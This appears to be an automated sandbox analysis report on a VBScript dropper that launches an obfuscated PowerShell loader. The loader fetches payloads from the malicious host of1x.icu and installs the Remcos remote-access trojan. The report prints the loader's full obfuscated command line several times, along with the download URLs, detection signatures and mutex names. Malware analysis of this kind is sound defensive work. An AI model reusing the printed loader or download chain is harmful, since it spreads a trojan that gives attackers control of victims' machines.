              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: Binary string: msiexec.pdb source: msiexec.exe, 00000008.00000003.2165802871.0000000006E2A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, remcos.exe, 00000009.00000000.2166500029.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000A.00000000.2266505717.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000B.00000000.2347262124.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe.8.dr
              Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2165802871.0000000006E2A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000000.2166500029.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000A.00000000.2266505717.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000B.00000000.2347262124.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe.8.dr
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2055634265.0000000008BD0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1700456681.0000021385281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698077766.0000021385081000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb+m source: powershell.exe, 00000003.00000002.2055634265.0000000008BD0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.2019662882.0000000003564000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2049592368.0000000007B66000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 104.21.86.72:443
              Source: global trafficHTTP traffic detected: GET /CACZkcPf/Schmeer.aca HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /rTPVLEPs/asyclWl80.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /CACZkcPf/Schmeer.aca HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /rTPVLEPs/asyclWl80.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: of1x.icu
              Source: powershell.exe, 00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C07CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://of1x.icu
              Source: powershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1821899527.00000223BEB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2021651093.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1821899527.00000223BEB11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000003.00000002.2021651093.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1821899527.00000223BF688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.i
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.ic
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1821899527.00000223BED38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/
              Source: msiexec.exe, 00000008.00000002.2169804742.0000000006D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/1
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/C
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CA
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CAC
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZ
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZk
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkc
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcP
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/S
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Sc
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Sch
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schm
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schme
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmee
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.a
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.ac
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.aca
              Source: powershell.exe, 00000001.00000002.1821899527.00000223BED38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.acaP
              Source: powershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.acaXR
              Source: msiexec.exe, 00000008.00000002.2169804742.0000000006D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/XV
              Source: msiexec.exe, 00000008.00000002.2169804742.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2185684711.0000000021F10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/rTPVLEPs/asyclWl80.bin
              Source: msiexec.exe, 00000008.00000002.2169804742.0000000006D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/rTPVLEPs/asyclWl80.binN
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.4:49737 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6804, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_764.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 764, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Potential malicious VBS script found (suspicious strings)
              Source: Initial file: Call Vikingernes238.ShellExecute( "p" + Omskifteligste,Shandies & Gilliver & Shandies ,"","",0)
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetArugeJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F63E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW,9_2_001F63E3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B76AB161_2_00007FFD9B76AB16
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B76B8C21_2_00007FFD9B76B8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B836BD81_2_00007FFD9B836BD8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E3E9283_2_04E3E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E3F1F83_2_04E3F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E3E5E03_2_04E3E5E0
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F63E39_2_001F63E3
              Source: Rokadernes.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5806
              Source: unknownProcess created: Commandline size = 5806
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5806Jump to behavior
              Source: amsi32_764.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 764, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@12/8@1/1
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F2F93 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,9_2_001F2F93
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F7DD0 StartServiceCtrlDispatcherW,GetLastError,9_2_001F7DD0
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F7DD0 StartServiceCtrlDispatcherW,GetLastError,9_2_001F7DD0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Wealthmaking.AsrJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-6US4Y7
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkgzrzdi.ndm.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2504
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=764
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= 